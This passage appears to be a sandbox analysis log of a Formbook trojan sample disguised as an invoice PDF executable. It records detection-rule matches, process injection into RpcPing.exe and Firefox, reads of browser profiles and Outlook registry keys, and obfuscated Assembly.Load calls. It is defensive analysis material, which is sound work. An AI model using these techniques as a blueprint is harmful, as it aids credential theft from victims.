Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, J1Np7SeHlsncQgvjqU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, J1Np7SeHlsncQgvjqU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: _0020.AddAccessRule
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: _0020.AddAccessRule
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, J1Np7SeHlsncQgvjqU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@5/4
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORIGINAL INVOICE COAU7230734298.pdf.exe.log Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\RpcPing.exe File created: C:\Users\user\AppData\Local\Temp\297268BLQ Jump to behavior
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RpcPing.exe, 00000008.00000003.2435255903.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432168414.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2431409420.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432933782.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2431030399.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432548929.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2929881128.00000000033E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Virustotal: Detection: 38%
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe" Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: credui.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe

Data Obfuscation

barindex
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.3682450.2.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.6b70000.4.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.366a230.1.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 8.2.RpcPing.exe.40bcd14.2.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 9.2.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 9.0.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 10.2.firefox.exe.31d5cd14.0.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: 0xAFFFFCB7 [Fri Jul 27 19:12:55 2063 UTC]
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E9DED push FFFFFF8Bh; iretd 0_2_070E9DEF
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040D0CA push edi; ret 3_2_0040D0CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00416166 pushfd ; iretd 3_2_004161E5
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00417984 push esp; iretd 3_2_0041798A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413B46 push eax; iretd 3_2_00413B71
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413B62 push eax; iretd 3_2_00413B71
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00408307 push ds; iretd 3_2_00408309
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00403330 push eax; ret 3_2_00403332
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00415C40 push ebx; ret 3_2_00415C6A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00415C43 push ebx; ret 3_2_00415C6A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00404D23 push esi; retf 3_2_00404D24
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413E4A push edi; retf 3_2_00413E4B
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413F1C push eax; ret 3_2_00413F26
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00417FD0 push esp; ret 3_2_00417FD1
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004187E8 push ebx; ret 3_2_004187E9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E225F pushad ; ret 3_2_019E27F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E27FA pushad ; ret 3_2_019E27F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A109AD push ecx; mov dword ptr [esp], ecx 3_2_01A109B6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E283D push eax; iretd 3_2_019E2858
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E1368 push eax; iretd 3_2_019E1369
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FEB7E push ebx; ret 7_2_036FEBA5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FEB7B push ebx; ret 7_2_036FEBA5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F1242 push ds; iretd 7_2_036F1244
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F6005 push edi; ret 7_2_036F6007
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FF0A1 pushfd ; iretd 7_2_036FF120
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_037008BF push esp; iretd 7_2_037008C5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03701723 push ebx; ret 7_2_03701724
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03700F0B push esp; ret